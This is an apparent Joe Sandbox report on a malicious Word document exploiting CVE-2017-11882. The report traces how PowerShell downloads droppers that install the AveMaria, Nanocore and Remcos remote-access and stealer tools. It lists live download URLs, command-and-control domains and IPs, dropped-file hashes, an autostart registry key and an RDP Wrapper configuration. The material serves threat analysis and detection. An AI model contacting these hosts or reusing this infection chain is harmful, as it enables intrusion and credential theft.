        Source: Yara match | File source: 00000015.00000003.2137304291.0000000000607000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000A.00000002.2119294130.0000000002637000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000A.00000002.2122718897.0000000003601000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000015.00000003.2137077371.0000000000603000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000B.00000002.2119646724.00000000025F7000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000D.00000003.2118755811.00000000005B6000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000D.00000003.2118971999.00000000005BD000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000D.00000003.2119027493.00000000005C3000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000011.00000002.2139607287.0000000003911000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000D.00000003.2118869644.00000000005B6000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000D.00000003.2118769952.00000000005BD000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000011.00000002.2136747408.0000000002947000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000015.00000003.2137213660.0000000000607000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000D.00000003.2118879592.00000000005BD000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000B.00000002.2123072051.00000000035C1000.00000004.00000001.sdmp, type: MEMORY

        Remote Access Functionality:

        Yara detected AveMaria stealer
        Source: Yara match | File sources: the same 17 unpacked PE files and 19 memory dumps listed for this signature under Stealing of Sensitive Information
        Yara detected Nanocore RAT
        Source: Yara match | File sources: the same 9 unpacked PE files and 8 memory dumps listed for this signature under Stealing of Sensitive Information
        Source: C:\ProgramData\images.exe | Code function: 21_3_04253030 sqlite3_clear_bindings,_memset,
        Source: C:\ProgramData\images.exe | Code function: 21_3_042550E0 sqlite3_bind_parameter_index,
        Source: C:\ProgramData\images.exe | Code function: 21_3_042552D0 sqlite3_transfer_bindings,
        Source: C:\ProgramData\images.exe | Code function: 21_3_04254C20 sqlite3_bind_int,

        Mitre Att&ck Matrix

        Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
        Valid Accounts | Windows Management Instrumentation 1 | LSASS Driver 2 | LSASS Driver 2 | Disable or Modify Tools 11 | OS Credential Dumping 3 | System Time Discovery 12 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 33 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Endpoint Denial of Service 1
        Default Accounts | Scripting 2 | Create Account 11 | Access Token Manipulation 1 | Deobfuscate/Decode Files or Information 1 | Input Capture 121 | System Service Discovery 1 | Remote Desktop Protocol | Data from Local System 1 | Exfiltration Over Bluetooth | Encrypted Channel 2 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
        Domain Accounts | Native API 1 | Windows Service 11 | Windows Service 11 | Scripting 2 | Credentials In Files 1 | File and Directory Discovery 5 | SMB/Windows Admin Shares | Input Capture 121 | Automated Exfiltration | Non-Standard Port 1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
        Local Accounts | Shared Modules 1 | Scheduled Task/Job 1 | Process Injection 622 | Obfuscated Files or Information 4 | NTDS | System Information Discovery 27 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Non-Application Layer Protocol 2 | SIM Card Swap | | Carrier Billing Fraud
        Cloud Accounts | Exploitation for Client Execution 33 | Registry Run Keys / Startup Folder 1 | Scheduled Task/Job 1 | Software Packing 3 | LSA Secrets | Security Software Discovery 331 | SSH | Keylogging | Data Transfer Size Limits | Application Layer Protocol 122 | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
        Replication Through Removable Media | Command and Scripting Interpreter 11 | Rc.common | Registry Run Keys / Startup Folder 1 | Masquerading 23 | Cached Domain Credentials | Virtualization/Sandbox Evasion 21 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
        External Remote Services | Scheduled Task/Job 1 | Startup Items | Startup Items | Modify Registry 1 | DCSync | Process Discovery 3 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
        Drive-by Compromise | Service Execution 2 | Scheduled Task/Job | Scheduled Task/Job | Virtualization/Sandbox Evasion 21 | Proc Filesystem | Application Window Discovery 1 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
        Exploit Public-Facing Application | PowerShell 3 | At (Linux) | At (Linux) | Access Token Manipulation 1 | /etc/passwd and /etc/shadow | Remote System Discovery 1 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction
        Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Process Injection 622 | Network Sniffing | Process Discovery | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | | | Data Encrypted for Impact
        Compromise Software Dependencies and Development Tools | Windows Command Shell | Cron | Cron | Hidden Files and Directories 1 | Input Capture | Permission Groups Discovery | Replication Through Removable Media | Remote Data Staging | Exfiltration Over Physical Medium | Mail Protocols | | | Service Stop
        Compromise Software Supply Chain | Unix Shell | Launchd | Launchd | Hidden Users 2 | Keylogging | Local Groups | Component Object Model and Distributed COM | Screen Capture | Exfiltration over USB | DNS | | | Inhibit System Recovery

        Behavior Graph

        Behavior Graph ID: 457815 | Sample: NEW PO1100372954 -.doc | Startdate: 02/08/2021 | Architecture: WINDOWS | Score: 100

        Start (node 2)
          DNS/IP: hhjhtggfr.duckdns.org
          Signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 22 other signatures
          Started: WINWORD.EXE (node 13); drvinst.exe (node 18); rdpdr.sys (node 20); 3 other processes (node 22)

        WINWORD.EXE (node 13; counters: 305, 48)
          DNS/IP: hhjhtggfr.duckdns.org 203.159.80.186, ports 49165, 49166, 49167, LOVESERVERSGB Netherlands; newhosteeeee.ydns.eu
          Dropped: C:\Users\user\AppData\Local\...\putty[1].exe (PE32); C:\Users\user\AppData\...\abdtfhghgdghgh .ScT (data); C:\Users\user\AppData\Local\...\FLD93F.tmp (370); C:\Users\user\AppData\Local\...\11DB366A.png (370)
          Signatures: Document exploit detected (creates forbidden files); Suspicious powershell command line found; Tries to download and execute files (via powershell); 2 other signatures
          Started: powershell.exe (node 24; counter: 7); powershell.exe (node 28; counter: 7); powershell.exe (node 30; counters: 12, 7); 3 other processes (node 33)

        powershell.exe (node 24)
          DNS/IP: newhosteeeee.ydns.eu
          Dropped: C:\Users\user\AppData\Roaming\putty.exe (PE32)
          Started: putty.exe (node 35; counters: 1, 7)

        powershell.exe (node 28)
          Started: putty.exe (node 38; counter: 2)

        powershell.exe (node 30)
          DNS/IP: newhosteeeee.ydns.eu
          Signatures: Powershell drops PE file

        3 other processes (node 33)
          Signatures: Injects files into Windows application

        putty.exe (node 35)
          Signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Contains functionality to inject threads in other processes; 2 other signatures
          Started: putty.exe (node 40; counters: 4, 4)

        putty.exe (node 38)
          Signatures: Injects a PE file into a foreign processes
          Started: putty.exe (node 44); putty.exe (node 46); putty.exe (node 48)

        putty.exe (node 40)
          Dropped: C:\ProgramData\images.exe (PE32)
          Signatures: Increases the number of concurrent connection per server for Internet Explorer; Hides that the sample has been downloaded from the Internet (zone.identifier)
          Started: images.exe (node 50); cmd.exe (node 53)

        images.exe (node 50)
          Signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Injects a PE file into a foreign processes
          Started: images.exe (node 55)

        cmd.exe (node 53)
          Started: reg.exe (node 60)

        images.exe (node 55)
          DNS/IP: hutyrtit.ydns.eu 203.159.80.165, ports 49169, 80, LOVESERVERSGB Netherlands; sdafsdffssffs.ydns.eu
          Dropped: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe (PE32); C:\Users\user\AppData\Local\...\microC[1].exe (PE32); C:\Program Files\Microsoft DN1\sqlmap.dll (PE32+); C:\Windows\System32\rfxvmt.dll (PE32+)
          Signatures: Hides user accounts; Tries to harvest and steal browser information (history, passwords, etc); Writes to foreign memory regions; 3 other signatures
          Started: iBCrDCK.i.exe (node 62); cmd.exe (node 65)

        reg.exe (node 60)
          Signatures: Creates an undocumented autostart registry key

        iBCrDCK.i.exe (node 62)
          Signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Injects a PE file into a foreign processes
          Started: iBCrDCK.i.exe (node 67); iBCrDCK.i.exe (node 72)

        iBCrDCK.i.exe (node 67)
          DNS/IP: hhjhtggfr.duckdns.org
          Dropped: C:\Program Files (x86)\...\smtpsvc.exe (PE32); C:\Users\user\AppData\Roaming\...\run.dat (International)
          Signatures: Hides that the sample has been downloaded from the Internet (zone.identifier)


        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        Source | Detection | Scanner | Label
        NEW PO1100372954 -.doc | 24% | ReversingLabs | Script.Exploit.CVE-2017-11882

        Dropped Files

        Source | Detection | Scanner | Label
        C:\Program Files (x86)\SMTP Service\smtpsvc.exe | 100% | Joe Sandbox ML |
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\microC[1].exe | 100% | Joe Sandbox ML |
        C:\Users\user\AppData\Roaming\iBCrDCK.i.exe | 100% | Joe Sandbox ML |
        C:\ProgramData\images.exe | 100% | Joe Sandbox ML |
        C:\Users\user\AppData\Roaming\putty.exe | 100% | Joe Sandbox ML |
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\putty[1].exe | 100% | Joe Sandbox ML |
        C:\Program Files (x86)\SMTP Service\smtpsvc.exe | 20% | ReversingLabs | ByteCode-MSIL.Backdoor.Remcos
        C:\Program Files\Microsoft DN1\sqlmap.dll | 20% | Metadefender |
        C:\Program Files\Microsoft DN1\sqlmap.dll | 43% | ReversingLabs | Win64.Trojan.RDPWrap
        C:\ProgramData\images.exe | 28% | ReversingLabs |
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\microC[1].exe | 20% | ReversingLabs | ByteCode-MSIL.Backdoor.Remcos
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\putty[1].exe | 28% | ReversingLabs |
        C:\Users\user\AppData\Roaming\iBCrDCK.i.exe | 20% | ReversingLabs | ByteCode-MSIL.Backdoor.Remcos
        C:\Users\user\AppData\Roaming\putty.exe | 28% | ReversingLabs |
        C:\Windows\System32\rfxvmt.dll | 0% | Metadefender |
        C:\Windows\System32\rfxvmt.dll | 0% | ReversingLabs |

        Unpacked PE Files

        Source | Detection | Scanner | Label
        21.2.images.exe.400000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen2
        15.2.putty.exe.400000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen2
        34.2.iBCrDCK.i.exe.400000.2.unpack | 100% | Avira | TR/Dropper.Gen
        34.2.iBCrDCK.i.exe.440000.4.unpack | 100% | Avira | TR/NanoCore.fadte
        13.2.putty.exe.400000.3.unpack | 100% | Avira | TR/Crypt.XPACK.Gen2

        Domains

        No Antivirus matches

        URLs

        Source | Detection | Scanner | Label
        http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe
        http://newhosteeeee.ydns.eu | 0% | Avira URL Cloud | safe
        http://hutyrtit.ydns.eu/microC.exe | 100% | Avira URL Cloud | malware
        httP://newhosteeeee.ydns.eu/putty.exePE | 0% | Avira URL Cloud | safe
        httP://newhosteeeee.ydns.eu/putty.exe | 0% | Avira URL Cloud | safe
        http://ja.com/ | 0% | Avira URL Cloud | safe
        http://java.co | 0% | Avira URL Cloud | safe
        http://www.%s.comPA | 0% | URL Reputation | safe
        http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe
        httP://newhosteeeee.ydns.eu/p | 0% | Avira URL Cloud | safe
        httP://newhosteeeee.ydns.eu/putt | 0% | Avira URL Cloud | safe

        Domains and IPs

        Contacted Domains

        Name | IP | Active | Malicious | Antivirus Detection | Reputation
        newhosteeeee.ydns.eu | 203.159.80.186 | true | false | | high
        sdafsdffssffs.ydns.eu | 203.159.80.186 | true | false | | high
        hutyrtit.ydns.eu | 203.159.80.165 | true | false | | high
        hhjhtggfr.duckdns.org | 203.159.80.186 | true | false | | high

                Contacted URLs

        Name | Malicious | Antivirus Detection | Reputation
        http://hutyrtit.ydns.eu/microC.exe | true | Avira URL Cloud: malware | unknown
        http://newhosteeeee.ydns.eu/putty.exe | true | | unknown

                  URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check | notepad.exe, 00000016.00000002.2364183393.0000000003017000.00000002.00000001.sdmp | false | - | high
http://www.icra.org/vocabulary/. | notepad.exe, 00000016.00000002.2364183393.0000000003017000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | powershell.exe, 00000003.00000002.2095131637.0000000002310000.00000002.00000001.sdmp, powershell.exe, 00000006.00000002.2099882416.0000000002420000.00000002.00000001.sdmp | false | - | high
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv | powershell.exe, 00000003.00000002.2094491159.00000000001CC000.00000004.00000020.sdmp, powershell.exe, 00000006.00000002.2096271913.00000000002FE000.00000004.00000020.sdmp | false | - | high
http://newhosteeeee.ydns.eu | powershell.exe, 00000003.00000002.2103127329.0000000003709000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.2111053200.00000000036C9000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.piriform.com/ccleaner. | powershell.exe, 00000003.00000002.2094474663.000000000019E000.00000004.00000020.sdmp | false | - | high
httP://newhosteeeee.ydns.eu/putty.exePE | powershell.exe, 00000003.00000002.2101696206.000000000360C000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.2109600442.00000000035CC000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | unknown
httP://newhosteeeee.ydns.eu/putty.exe | powershell.exe, 00000006.00000002.2096371882.000000000036E000.00000004.00000020.sdmp | true | Avira URL Cloud: safe | unknown
http://ja.com/ | powershell.exe, 00000006.00000002.2096271913.00000000002FE000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
http://java.co | powershell.exe, 00000006.00000002.2096271913.00000000002FE000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
http://www.piriform.com/ccleaner | powershell.exe, 00000003.00000002.2094491159.00000000001CC000.00000004.00000020.sdmp, powershell.exe, 00000006.00000002.2096271913.00000000002FE000.00000004.00000020.sdmp | false | - | high
http://www.%s.comPA | powershell.exe, 00000003.00000002.2095131637.0000000002310000.00000002.00000001.sdmp, powershell.exe, 00000006.00000002.2099882416.0000000002420000.00000002.00000001.sdmp | false | URL Reputation: safe | low
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | notepad.exe, 00000016.00000002.2364183393.0000000003017000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
https://github.com/syohex/java-simple-mine-sweeperC: | putty.exe, 0000000A.00000002.2122718897.0000000003601000.00000004.00000001.sdmp, putty.exe, 0000000B.00000002.2119646724.00000000025F7000.00000004.00000001.sdmp | false | - | high
httP://newhosteeeee.ydns.eu/p | powershell.exe, 00000003.00000002.2103127329.0000000003709000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | unknown
https://github.com/syohex/java-simple-mine-sweeper | putty.exe, images.exe | false | - | high
httP://newhosteeeee.ydns.eu/putt | powershell.exe, 00000003.00000002.2101696206.000000000360C000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.2109600442.00000000035CC000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | unknown

                                Contacted IPs


                                Public

IP | Domain | Country | ASN | ASN Name | Malicious
203.159.80.186 | newhosteeeee.ydns.eu | Netherlands | 47987 | LOVESERVERSGB | false
203.159.80.165 | hutyrtit.ydns.eu | Netherlands | 47987 | LOVESERVERSGB | false

                                General Information

                                Joe Sandbox Version:33.0.0 White Diamond
                                Analysis ID:457815
                                Start date:02.08.2021
                                Start time:10:59:02
                                Joe Sandbox Product:CloudBasic
                                Overall analysis duration:0h 14m 35s
                                Hypervisor based Inspection enabled:false
                                Report type:light
                                Sample file name:NEW PO1100372954 -.doc
                                Cookbook file name:defaultwindowsofficecookbook.jbs
                                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                Number of analysed new started processes analysed:33
                                Number of new started drivers analysed:4
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • HDC enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Detection:MAL
                                Classification:mal100.phis.troj.spyw.expl.evad.winDOC@45/31@24/2
                                EGA Information:Failed
                                HDC Information:
                                • Successful, ratio: 50.5% (good quality ratio 49.5%)
                                • Quality average: 87.6%
                                • Quality standard deviation: 20.8%
                                HCA Information:
                                • Successful, ratio: 99%
                                • Number of executed functions: 0
                                • Number of non-executed functions: 0
                                Cookbook Comments:
                                • Adjust boot time
                                • Enable AMSI
                                • Found application associated with file extension: .doc
                                • Found Word or Excel or PowerPoint or XPS Viewer
                                • Attach to Office via COM
                                • Active ActiveX Object
                                • Scroll down
                                • Close Viewer
                                Warnings:
                                • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe, svchost.exe
                                • TCP Packets have been reduced to 100
                                • Not all processes where analyzed, report is missing behavior information
                                • Report creation exceeded maximum time and may have missing behavior and disassembly information.
                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                • Report size exceeded maximum capacity and may have missing behavior information.
                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                • Report size getting too big, too many NtCreateFile calls found.
                                • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                • Report size getting too big, too many NtEnumerateValueKey calls found.
                                • Report size getting too big, too many NtOpenFile calls found.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtQueryAttributesFile calls found.
                                • Report size getting too big, too many NtQueryDirectoryFile calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • Report size getting too big, too many NtSetInformationFile calls found.
                                • VT rate limit hit for: /opt/package/joesandbox/database/analysis/457815/sample/NEW PO1100372954 -.doc

                                Simulations

                                Behavior and APIs

Time | Type | Description
10:59:41 | API Interceptor | 69x Sleep call for process: powershell.exe modified
10:59:50 | API Interceptor | 19x Sleep call for process: putty.exe modified
10:59:59 | API Interceptor | 1204x Sleep call for process: images.exe modified
11:00:13 | API Interceptor | 709x Sleep call for process: cmd.exe modified
11:00:16 | API Interceptor | 983x Sleep call for process: iBCrDCK.i.exe modified
11:00:23 | API Interceptor | 37x Sleep call for process: drvinst.exe modified
11:00:39 | Autostart | Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run SMTP Service C:\Program Files (x86)\SMTP Service\smtpsvc.exe
11:00:49 | API Interceptor | 140x Sleep call for process: smtpsvc.exe modified

                                Joe Sandbox View / Context

                                IPs

                                No context

                                Domains

                                No context

                                ASN

                                No context

                                JA3 Fingerprints

                                No context

                                Dropped Files

                                No context

                                Created / dropped Files

                                C:\Program Files (x86)\SMTP Service\smtpsvc.exe
                                Process:C:\Users\user\AppData\Roaming\iBCrDCK.i.exe
                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:dropped
                                Size (bytes):0
                                Entropy (8bit):0.0
                                Encrypted:false
                                SSDEEP:24576:26IBQ76DOifx8Dgyfx8Dgz06TbTZpq72pMNaDuDHQUl3uwDZzGL:OQ76f58Dgy58Dgz06n1pfWNdlJZa
                                MD5:8FA8F52DFC55D341300EFF8E4C44BA33
                                SHA1:4FBDB8C39BBC48B159E1F795A2222D51077FDBE9
                                SHA-256:2C7DA7FF43C90AE620FD5135C2ED34C7E644A9A1098BFB69F1DC6B8AB6410C9A
                                SHA-512:A29B2B8FCDE4EF5917E6AAD29C547D2FCEF3E452B3ED502788BD5BF7CB2E107C46A12783EBBE8EB4AA896C56DFD3FD37C994B67EB5C8F5C9C32FBA75FE486205
                                Malicious:true
                                Antivirus:
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                • Antivirus: ReversingLabs, Detection: 20%
                                Reputation:unknown
                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...1..a..............P..............L... ...`....@.. .......................`............@..................................K..O....`.. ....................@....................................................... ............... ..H............text....,... ...................... ..`.rsrc... ....`.......0..............@..@.reloc.......@......................@..B.................K......H........0..d.......s........o............................................(....*&..(.....*.s.........s ........s!........s"........s#........*...0...........~....o$....+..*.0...........~....o%....+..*.0...........~....o&....+..*.0...........~....o'....+..*.0...........~....o(....+..*.0..<........~.....().....,!r...p.....(*...o+...s,............~.....+..*.0...........~.....+..*".......*.0..&........(....r1..p~....o-...(......t$....+..*...0..&........(....r7..p~....o-...(......
                                C:\Program Files\Microsoft DN1\rdpwrap.ini
                                Process:C:\ProgramData\images.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):181846
                                Entropy (8bit):5.421809355655133
                                Encrypted:false
                                SSDEEP:768:WEUfQYczxEQBLWf9PUupBdfbQnxJcRZsMFdKlax8Rr/d6gl/+f8jZ0fyL+8F7f6/:57f6GqZm0c11IvimstYUWtN/7
                                MD5:6BC395161B04AA555D5A4E8EB8320020
                                SHA1:F18544FAA4BD067F6773A373D580E111B0C8C300
                                SHA-256:23390DFCDA60F292BA1E52ABB5BA2F829335351F4F9B1D33A9A6AD7A9BF5E2BE
                                SHA-512:679AC80C26422667CA5F2A6D9F0E022EF76BC9B09F97AD390B81F2E286446F0658524CCC8346A6E79D10E42131BC428F7C0CE4541D44D83AF8134C499436DAAE
                                Malicious:false
                                Reputation:unknown
                                Preview: ; RDP Wrapper Library configuration..; Do not modify without special knowledge....[Main]..Updated=2020-08-25..LogFile=\rdpwrap.txt..SLPolicyHookNT60=1..SLPolicyHookNT61=1....[PatchCodes]..nop=90..Zero=00..jmpshort=EB..nopjmp=90E9..CDefPolicy_Query_edx_ecx=BA000100008991200300005E90..CDefPolicy_Query_eax_rcx_jmp=B80001000089813806000090EB..CDefPolicy_Query_eax_esi=B80001000089862003000090..CDefPolicy_Query_eax_rdi=B80001000089873806000090..CDefPolicy_Query_eax_ecx=B80001000089812003000090..CDefPolicy_Query_eax_ecx_jmp=B800010000898120030000EB0E..CDefPolicy_Query_eax_rcx=B80001000089813806000090..CDefPolicy_Query_edi_rcx=BF0001000089B938060000909090....[SLInit]..bServerSku=1..bRemoteConnAllowed=1..bFUSEnabled=1..bAppServerAllowed=1..bMultimonAllowed=1..lMaxUserSessions=0..ulMaxDebugSessions=0..bInitialized=1....[SLPolicy]..TerminalServices-RemoteConnectionManager-AllowRemoteConnections=1..TerminalServices-RemoteConnectionManager-AllowMultipleSessions=1..TerminalServices-RemoteConnectionM
                                C:\Program Files\Microsoft DN1\sqlmap.dll
                                Process:C:\ProgramData\images.exe
                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                Category:dropped
                                Size (bytes):116736
                                Entropy (8bit):5.884975745255681
                                Encrypted:false
                                SSDEEP:3072:m3zxbyHM+TstVfFyov7je9LBMMmMJDOvYYVs:oMjTiVw2ve9LBMMpJsT
                                MD5:461ADE40B800AE80A40985594E1AC236
                                SHA1:B3892EEF846C044A2B0785D54A432B3E93A968C8
                                SHA-256:798AF20DB39280F90A1D35F2AC2C1D62124D1F5218A2A0FA29D87A13340BD3E4
                                SHA-512:421F9060C4B61FA6F4074508602A2639209032FD5DF5BFC702A159E3BAD5479684CCB3F6E02F3E38FB8DB53839CF3F41FE58A3ACAD6EC1199A48DC333B2D8A26
                                Malicious:true
                                Antivirus:
• Antivirus: Metadefender, Detection: 20%
                                • Antivirus: ReversingLabs, Detection: 43%
                                Reputation:unknown
                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........N.rB/.!B/.!B/.!.~.!j/.!.~.!&/.!.~3!H/.!..'!G/.!B/.!./.!O}.!F/.!O}0!C/.!O}7!C/.!O}2!C/.!RichB/.!................PE..d...Z..T.........." .................Q....................................... ............`.........................................0...l.......<...................................................................`...p............ ...............................text............................... ..`.rdata..<.... ......................@..@.data....=..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................
                                C:\ProgramData\images.exe
                                Process:C:\Users\user\AppData\Roaming\putty.exe
                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:dropped
                                Size (bytes):731648
                                Entropy (8bit):7.501590274865465
                                Encrypted:false
                                SSDEEP:12288:hdJnZDHQg/eZ0EaMEH+a2C9mIzUewRTCABR4x9kB3AHwmV2h1mFbiwN2:Pw05H+NC9mIzUewRTC0Ui3APmY
                                MD5:0CFE251E0B61BBC87656F52DEFAD4C53
                                SHA1:D7126889DC5FFCF23C90FFA19A359060658A0388
                                SHA-256:DB531D6E969F16A9318224E16A18F3314FA75D0EAAD90FC9A805F10D098D67C9
                                SHA-512:85E15BF86BC62B9AE552FAC7118A9F54631BA84FDF60ACB803348813B67E0B4349F82FBF312474879C3DC209E06EC21E8BFACEDF91CA2D3B490270F655BF980D
                                Malicious:true
                                Antivirus:
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                • Antivirus: ReversingLabs, Detection: 28%
                                Reputation:unknown
                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...F..a..............P.. ..........z;... ...@....@.. ....................................@.................................(;..O....@.......................`....................................................... ............... ..H............text...`.... ... .................. ..`.rsrc........@......."..............@..@.reloc.......`.......(..............@..B................\;......H........................... w...........................................0............(+...(,.........(.....o-....*.....................(.......(/......(0......(1......(2....*N..(....o....(3....*&..(4....*.s5........s6........s7........s8........s9........*....0...........~....o:....+..*.0...........~....o;....+..*.0...........~....o<....+..*.0...........~....o=....+..*.0...........~....o>....+..*.0..<........~.....(?.....,!r...p.....(@...oA...sB............~.....+..*.0......
                                C:\Users\user\AppData\Local\Microsoft Vision\02-08-2021_11.00.14
                                Process:C:\ProgramData\images.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):118
                                Entropy (8bit):3.2566267151938755
                                Encrypted:false
                                SSDEEP:3:ilsVeJ7lfo0eF2PNylRflyQHAnyWdl+SliXln:ilKSNombQgyWn+Sk1
                                MD5:9DD34F139B8B7D0FC865CDE6027043FB
                                SHA1:F9098E55DD0B2F83C8C58E117804F12DCAEA8D93
                                SHA-256:96BE75D129E470DEEBADA5AD99013E91F0454306B24650A6BC043C1B22A40D46
                                SHA-512:7031A0A6EE90FB6C9725232BEF9EE93574E8DC6A77B0DECBC3EF2B7FBB23966E5F3C0BCF1AD30C1892B9E8437377A893201B8E10B94763EB34477D13BAD2A121
                                Malicious:false
                                Reputation:unknown
                                Preview: ..{.i.m.g.s. .[.C.o.m.p.a.t.i.b.i.l.i.t.y. .M.o.d.e.]. .-. .M.i.c.r.o.s.o.f.t. .W.o.r.d.}...L.e.f.t. .W.i.n.d.o.w.s.r.
                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\microC[1].exe
                                Process:C:\ProgramData\images.exe
                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:downloaded
                                Size (bytes):1378816
                                Entropy (8bit):7.548476087877472
                                Encrypted:false
                                SSDEEP:24576:26IBQ76DOifx8Dgyfx8Dgz06TbTZpq72pMNaDuDHQUl3uwDZzGL:OQ76f58Dgy58Dgz06n1pfWNdlJZa
                                MD5:8FA8F52DFC55D341300EFF8E4C44BA33
                                SHA1:4FBDB8C39BBC48B159E1F795A2222D51077FDBE9
                                SHA-256:2C7DA7FF43C90AE620FD5135C2ED34C7E644A9A1098BFB69F1DC6B8AB6410C9A
                                SHA-512:A29B2B8FCDE4EF5917E6AAD29C547D2FCEF3E452B3ED502788BD5BF7CB2E107C46A12783EBBE8EB4AA896C56DFD3FD37C994B67EB5C8F5C9C32FBA75FE486205
                                Malicious:true
                                Antivirus:
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                • Antivirus: ReversingLabs, Detection: 20%
                                Reputation:unknown
                                IE Cache URL:http://hutyrtit.ydns.eu/microC.exe
